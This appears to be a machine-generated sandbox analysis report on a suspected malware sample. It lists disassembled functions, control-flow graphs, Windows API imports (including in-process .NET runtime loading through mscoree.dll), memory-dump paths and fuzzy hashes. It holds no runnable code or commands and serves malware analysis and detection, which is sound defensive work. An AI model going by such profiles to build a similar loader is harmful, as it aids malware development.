6d01b8c5-6d01b8d0 1478->1479 1479->1479 1480 6d01b8d2-6d01b8f0 GetProcAddress 1479->1480 1480->1444 1481 6d01b8f2-6d01b8ff call 6d005340 1480->1481 1485 6d01b900-6d01b905 1481->1485 1485->1485 1486 6d01b907-6d01b90d 1485->1486 1486->1485 1487 6d01b90f-6d01b912 1486->1487 1488 6d01b914-6d01b929 1487->1488 1489 6d01b93a 1487->1489 1490 6d01b931-6d01b938 1488->1490 1491 6d01b92b-6d01b92e 1488->1491 1492 6d01b93d-6d01b948 call 6d01ad80 1489->1492 1490->1492 1491->1490 1492->1444
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,4E8A916F), ref: 6D01B711
                                                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6D01B71C
                                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6D01B730
                                                                                          • __cftoe.LIBCMT ref: 6D01B870
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6D01B88B
                                                                                          • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6D01B8D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                                                          • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                                                          • API String ID: 1275574042-506955582
                                                                                          • Opcode ID: 9488a5ff3b6e2af2e473f096ce6e2f7176c01f1ba9ce28c28c4afa37e84ce58c
                                                                                          • Instruction ID: 6ddae09114873d7f1548cc1b3c5e350bcee61684b12197ba57ebc696760f57fa
                                                                                          • Opcode Fuzzy Hash: 9488a5ff3b6e2af2e473f096ce6e2f7176c01f1ba9ce28c28c4afa37e84ce58c
                                                                                          • Instruction Fuzzy Hash: B8912971D082899FEB04DFE8CC80AAEBBB5FF49310B10856DE119AB351D770A946CB55
                                                                                          Function 02EBB8A8 Relevance: 7.1, Strings: 5, Instructions: 825COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                          • API String ID: 0-3486158592
                                                                                          • Opcode ID: 0afb6738475e8624cf72c716dda2bd820fbaf1e30a0768fa5f52c3c6ac988869
                                                                                          • Instruction ID: 741f2f328720e3c74b7ebe4ef42d3160e8f04b9909f71085412294ce44099779
                                                                                          • Opcode Fuzzy Hash: 0afb6738475e8624cf72c716dda2bd820fbaf1e30a0768fa5f52c3c6ac988869
                                                                                          • Instruction Fuzzy Hash: 7F628F34A405158FCB19DF69C884AEEBBB2BF88718F15E569E805DB364DB31EC41CB90
                                                                                          Function 054333D0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8cq
                                                                                          • API String ID: 0-304758316
                                                                                          • Opcode ID: 62787e0f3ee8cb75f998f831766c7d09c3d9b8d37c63c7c2c83f074c9bec20fd
                                                                                          • Instruction ID: b34f6339de73b068dbad50474dac60a316799174cb9f7ea6869024f323737413
                                                                                          • Opcode Fuzzy Hash: 62787e0f3ee8cb75f998f831766c7d09c3d9b8d37c63c7c2c83f074c9bec20fd
                                                                                          • Instruction Fuzzy Hash: F331F375D41208AFDB04CFA8D480AEEBBF6FF49310F10906AE911B7260DB71AA05CB95
                                                                                          Function 054333D8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8cq
                                                                                          • API String ID: 0-304758316
                                                                                          • Opcode ID: bff947af6581e42ba20dc32ae740e7164cbd7e8e9a284fd895baa1a7aa5deaff
                                                                                          • Instruction ID: 8d5ff71981f922699b787c00940de94978dccb496fafe8064d6ec61e5cab7619
                                                                                          • Opcode Fuzzy Hash: bff947af6581e42ba20dc32ae740e7164cbd7e8e9a284fd895baa1a7aa5deaff
                                                                                          • Instruction Fuzzy Hash: 0931E475D41208AFDB04CFA8D480AEEFBF6FF49310F10946AE911B7260DB719A45CB95
                                                                                          Function 05CC26F8 Relevance: .5, Instructions: 481COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90c8290e4f7e9cc0c6184e21b5d5fdaa3ce20c73ba1084403e172219ace2083c
                                                                                          • Instruction ID: 1f6529d368cb67f0fed480bd4516ca563bfa090bce00031d186dff0009c31458
                                                                                          • Opcode Fuzzy Hash: 90c8290e4f7e9cc0c6184e21b5d5fdaa3ce20c73ba1084403e172219ace2083c
                                                                                          • Instruction Fuzzy Hash: E1328174E012299FDB64DFA9C894BEDBBB2BF89300F1081AAD549A7354DB305E81CF51
                                                                                          Function 02EB8958 Relevance: .4, Instructions: 398COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eae63e89815523a81b01d8d1afcbd4a8290e89f313cfbd0074c780114a5f2abe
                                                                                          • Instruction ID: d072b380ff02a54f71f53ba464eb314fe2e35e43b175d7658aa55a2a27bd173c
                                                                                          • Opcode Fuzzy Hash: eae63e89815523a81b01d8d1afcbd4a8290e89f313cfbd0074c780114a5f2abe
                                                                                          • Instruction Fuzzy Hash: BA129D74E002288FDB64DF69C984B9EBBB6BF89304F1081AAD509A7355DB305E85CF50
                                                                                          Function 05CC26F2 Relevance: .2, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b859713c512d832fe0dabe20972e84325d7d4af57b147f8fb0fa615513cc6401
                                                                                          • Instruction ID: 3bb7abf346a0a5c047852d93f57c060c02c5d8b5182f21966c009a0a100aa047
                                                                                          • Opcode Fuzzy Hash: b859713c512d832fe0dabe20972e84325d7d4af57b147f8fb0fa615513cc6401
                                                                                          • Instruction Fuzzy Hash: 4C91A374E012289FDB64DF6AC884BDDBBB2BF89300F1481AAD54DAB354DB305A81CF51
                                                                                          Function 6D029357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0284BF
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0284D2
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D02850A
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0294C1
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0294D4
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D02950C
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0297A4
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0297B7
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D0297F2
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D029D5F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D029D72
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D029DAF
                                                                                            • Part of subcall function 6D023A90: SafeArrayDestroy.OLEAUT32(?), ref: 6D023BCF
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D02A1BC
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D02A1CF
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D02A20C
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID: A
                                                                                          • API String ID: 959723449-3554254475
                                                                                          • Opcode ID: b5d2a776a7620605da943a5c4c7759a09ae0c72cd5d26fc4454a65e7889f0989
                                                                                          • Instruction ID: def436d776687eb0f97f133cfbd99cecf7cbc3706053f50d95007f615efb894f
                                                                                          • Opcode Fuzzy Hash: b5d2a776a7620605da943a5c4c7759a09ae0c72cd5d26fc4454a65e7889f0989
                                                                                          • Instruction Fuzzy Hash: 6D23A574A05205DFEB00DFA4CC84FAD77F9AF49304F658098EA09AF296DB71E945CB60
                                                                                          Function 6D022970 Relevance: 25.8, APIs: 17, Instructions: 335COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1022 6d022970-6d0229c1 1023 6d0229c3-6d0229c8 call 6d07c1e0 1022->1023 1024 6d0229cd-6d0229d7 1022->1024 1023->1024 1088 6d0229d8 call 137d149 1024->1088 1089 6d0229d8 call 137d148 1024->1089 1026 6d0229da-6d0229dc 1027 6d022d12-6d022d18 1026->1027 1028 6d0229e2-6d0229e8 1026->1028 1029 6d022d21-6d022d37 1027->1029 1031 6d022d1a-6d022d1b SafeArrayDestroy 1027->1031 1028->1029 1030 6d0229ee-6d022a1a SafeArrayGetLBound SafeArrayGetUBound 1028->1030 1030->1027 1032 6d022a20-6d022a37 SafeArrayGetElement 1030->1032 1031->1029 1032->1027 1033 6d022a3d-6d022a4d 1032->1033 1033->1023 1034 6d022a53-6d022a6f 1033->1034 1036 6d022a75-6d022a77 1034->1036 1037 6d022d5a-6d022d5f 1034->1037 1036->1037 1038 6d022a7d-6d022a92 call 6d0238e0 1036->1038 1039 6d022c76-6d022c78 1037->1039 1044 6d022c58-6d022c63 1038->1044 1045 6d022a98-6d022aac 1038->1045 1039->1027 1040 6d022c7e-6d022c86 1039->1040 1040->1027 1048 6d022c65-6d022c6a 1044->1048 1049 6d022c6d-6d022c72 1044->1049 1046 6d022ab6-6d022acc VariantInit 1045->1046 1047 6d022aae-6d022ab3 1045->1047 1046->1023 1050 6d022ad2-6d022ae3 1046->1050 1047->1046 1048->1049 1049->1039 1051 6d022ae5-6d022ae7 1050->1051 1052 6d022ae9-6d022aeb 1050->1052 1053 6d022aee-6d022af2 1051->1053 1052->1053 1054 6d022af4-6d022af6 1053->1054 1055 6d022af8 1053->1055 1056 6d022afa-6d022b34 1054->1056 1055->1056 1058 6d022b3a-6d022b50 VariantInit 1056->1058 1059 6d022c8b-6d022caa VariantClear * 2 1056->1059 1058->1023 1060 6d022b56-6d022b67 1058->1060 1059->1049 1061 6d022cac-6d022cb4 1059->1061 1062 6d022b69-6d022b6b 1060->1062 1063 6d022b6d-6d022b6f 1060->1063 1061->1049 1064 6d022b72-6d022b76 1062->1064 1063->1064 1066 6d022b78-6d022b7a 1064->1066 1067 6d022b7c 1064->1067 1068 6d022b7e-6d022bb8 1066->1068 1067->1068 1070 6d022d3a-6d022d55 VariantClear * 3 1068->1070 1071 6d022bbe-6d022bcb 1068->1071 1070->1044 1071->1070 1072 6d022bd1-6d022bf3 call 6d033160 1071->1072 1076 6d022cb6-6d022cf1 VariantClear * 3 1072->1076 1077 6d022bf9-6d022c1f VariantClear * 3 1072->1077 1084 6d022cf3-6d022cf6 1076->1084 1085 6d022cfb-6d022d06 1076->1085 1078 6d022c21-6d022c26 1077->1078 1079 6d022c29-6d022c34 1077->1079 1078->1079 1080 6d022c36-6d022c3b 1079->1080 1081 6d022c3e-6d022c4d 1079->1081 1080->1081 1081->1032 1083 6d022c53 1081->1083 1083->1027 1084->1085 1086 6d022d10 1085->1086 1087 6d022d08-6d022d0d 1085->1087 1086->1027 1087->1086 1088->1026 1089->1026
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0229F6
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D022A08
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D022A2F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022ABB
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022B3F
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C04
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C0B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C12
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C96
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C9D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CD6
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CDD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CE4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D022D1B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D45
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D4C
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D53
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                                                          • String ID:
                                                                                          • API String ID: 214056513-0
                                                                                          • Opcode ID: ab5cdd7c0001c9cea479c5b61711bdb36921555a5ad60baf530850d6712ed05a
                                                                                          • Instruction ID: f8d48ec5c1523e3f9fb03d6f01bdda98e984d10d1a2d6d278fa5d3df048da361
                                                                                          • Opcode Fuzzy Hash: ab5cdd7c0001c9cea479c5b61711bdb36921555a5ad60baf530850d6712ed05a
                                                                                          • Instruction Fuzzy Hash: 96C178716183419FEB10CFA8C884A6BBBE9BFC9304F20895DF695CB261C775E845CB52
                                                                                          Function 6D01AF30 Relevance: 24.3, APIs: 16, Instructions: 335COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1090 6d01af30-6d01af95 VariantInit * 3 1091 6d01afa1-6d01afa7 1090->1091 1092 6d01af97-6d01af9c call 6d07c1e0 1090->1092 1094 6d01afb1-6d01afbf 1091->1094 1095 6d01afa9-6d01afae 1091->1095 1092->1091 1171 6d01afc0 call 137d149 1094->1171 1172 6d01afc0 call 137d148 1094->1172 1095->1094 1096 6d01afc2-6d01afc4 1097 6d01afca-6d01afda call 6d0238e0 1096->1097 1098 6d01b22c-6d01b252 VariantClear * 3 1096->1098 1097->1098 1105 6d01afe0-6d01aff4 1097->1105 1100 6d01b254-6d01b257 1098->1100 1101 6d01b25c-6d01b26a 1098->1101 1100->1101 1103 6d01b274-6d01b288 1101->1103 1104 6d01b26c-6d01b271 1101->1104 1104->1103 1106 6d01aff6-6d01aff9 1105->1106 1107 6d01affe-6d01b015 VariantCopy 1105->1107 1106->1107 1108 6d01b017-6d01b018 call 6d07c1e0 1107->1108 1109 6d01b01d-6d01b033 VariantClear 1107->1109 1108->1109 1111 6d01b035-6d01b03a call 6d07c1e0 1109->1111 1112 6d01b03f-6d01b050 1109->1112 1111->1112 1114 6d01b052-6d01b054 1112->1114 1115 6d01b056-6d01b058 1112->1115 1116 6d01b05b-6d01b05f 1114->1116 1115->1116 1117 6d01b061-6d01b063 1116->1117 1118 6d01b065 1116->1118 1119 6d01b067-6d01b09a 1117->1119 1118->1119 1169 6d01b09d call 137d149 1119->1169 1170 6d01b09d call 137d148 1119->1170 1120 6d01b09f-6d01b0a1 1120->1098 1121 6d01b0a7-6d01b0b3 call 6d069bb5 1120->1121 1124 6d01b0c1 1121->1124 1125 6d01b0b5-6d01b0bf 1121->1125 1126 6d01b0c3-6d01b0ca 1124->1126 1125->1126 1127 6d01b0d0-6d01b0d9 1126->1127 1127->1127 1128 6d01b0db-6d01b111 call 6d0691e1 call 6d06a136 1127->1128 1133 6d01b113-6d01b118 call 6d07c1e0 1128->1133 1134 6d01b11d-6d01b12b 1128->1134 1133->1134 1136 6d01b131-6d01b133 1134->1136 1137 6d01b12d-6d01b12f 1134->1137 1138 6d01b136-6d01b13a 1136->1138 1137->1138 1139 6d01b140 1138->1139 1140 6d01b13c-6d01b13e 1138->1140 1141 6d01b142-6d01b17e 1139->1141 1140->1141 1143 6d01b180-6d01b18a 1141->1143 1144 6d01b1ff-6d01b203 1141->1144 1147 6d01b190-6d01b1b9 SafeArrayGetLBound SafeArrayGetUBound 1143->1147 1148 6d01b28d-6d01b2b8 VariantClear * 3 1143->1148 1145 6d01b210-6d01b215 1144->1145 1146 6d01b205-6d01b20e call 6d069c35 1144->1146 1152 6d01b223-6d01b229 call 6d069b35 1145->1152 1153 6d01b217-6d01b220 call 6d069c35 1145->1153 1146->1145 1154 6d01b28b 1147->1154 1155 6d01b1bf-6d01b1cd SafeArrayAccessData 1147->1155 1150 6d01b2c2-6d01b2d0 1148->1150 1151 6d01b2ba-6d01b2bf 1148->1151 1159 6d01b2d2-6d01b2d7 1150->1159 1160 6d01b2da-6d01b2ee 1150->1160 1151->1150 1152->1098 1153->1152 1154->1148 1155->1154 1156 6d01b1d3-6d01b1f7 call 6d0691e1 call 6d06a530 SafeArrayUnaccessData 1155->1156 1156->1154 1168 6d01b1fd 1156->1168 1159->1160 1168->1144 1169->1120 1170->1120 1171->1096 1172->1096
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF75
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF7C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF83
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 6D01B00D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B027
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01B19C
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01B1AA
                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 6D01B1C5
                                                                                          • _memmove.LIBCMT ref: 6D01B1E6
                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 6D01B1EF
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B237
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B23E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B245
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B29D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B2A4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B2AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3403836469-0
                                                                                          • Opcode ID: 1f8dfa9e8d4fd83c288e1abc7039d7f2efa33c820ccd69c6b74a7f85a389af5e
                                                                                          • Instruction ID: 8c2411cea4ef82ee5a80834708c2523305f20e002992243d09786b18da9b8413
                                                                                          • Opcode Fuzzy Hash: 1f8dfa9e8d4fd83c288e1abc7039d7f2efa33c820ccd69c6b74a7f85a389af5e
                                                                                          • Instruction Fuzzy Hash: E2C14BB16083429FE700DFA8CC84A5AB7E9FB8A304F55896DF659C7350D731E905CBA2
                                                                                          Function 6D02D410 Relevance: 24.3, APIs: 16, Instructions: 290COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1173 6d02d410-6d02d44c 1174 6d02d472-6d02d4e0 VariantInit * 3 1173->1174 1175 6d02d44e-6d02d465 1173->1175 1176 6d02d4e2-6d02d4ea 1174->1176 1177 6d02d4ec-6d02d4f2 1174->1177 1178 6d02d4f6-6d02d504 1176->1178 1177->1178 1179 6d02d506-6d02d50d 1178->1179 1180 6d02d51e-6d02d527 1178->1180 1183 6d02d514-6d02d516 1179->1183 1184 6d02d50f-6d02d512 1179->1184 1181 6d02d538-6d02d53c 1180->1181 1182 6d02d529-6d02d530 1180->1182 1186 6d02d540-6d02d544 1181->1186 1182->1181 1185 6d02d532-6d02d536 1182->1185 1187 6d02d518-6d02d51c 1183->1187 1184->1187 1185->1186 1188 6d02d704-6d02d72f VariantClear * 3 1186->1188 1189 6d02d54a-6d02d5c0 call 6d069d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1186->1189 1187->1179 1187->1180 1191 6d02d731-6d02d757 1188->1191 1192 6d02d76c-6d02d783 1188->1192 1197 6d02d5c2-6d02d5c4 1189->1197 1198 6d02d5c6-6d02d5ea call 6d06a530 SafeArrayUnaccessData 1189->1198 1194 6d02d470 1191->1194 1195 6d02d75d 1191->1195 1194->1174 1199 6d02d5ec-6d02d605 SafeArrayPutElement 1197->1199 1198->1199 1202 6d02d6e5-6d02d6eb 1199->1202 1203 6d02d60b-6d02d629 1199->1203 1204 6d02d6f6-6d02d6f8 1202->1204 1205 6d02d6ed-6d02d6f3 call 6d069d2c 1202->1205 1206 6d02d633-6d02d64f SafeArrayPutElement VariantClear 1203->1206 1207 6d02d62b-6d02d630 1203->1207 1210 6d02d701 1204->1210 1211 6d02d6fa-6d02d6fb SafeArrayDestroy 1204->1211 1205->1204 1206->1202 1209 6d02d655-6d02d664 1206->1209 1207->1206 1213 6d02d762-6d02d767 call 6d07c1e0 1209->1213 1214 6d02d66a-6d02d694 1209->1214 1210->1188 1211->1210 1213->1192 1226 6d02d697 call 137d149 1214->1226 1227 6d02d697 call 137d148 1214->1227 1216 6d02d699-6d02d69b 1216->1202 1217 6d02d69d-6d02d6a9 1216->1217 1217->1202 1218 6d02d6ab-6d02d6c1 call 6d01db30 1217->1218 1218->1202 1221 6d02d6c3-6d02d6e0 call 6d0256b0 call 6d026880 1218->1221 1221->1202 1226->1216 1227->1216
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4B3
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4C5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D4CC
                                                                                          • _malloc.LIBCMT ref: 6D02D551
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D58B
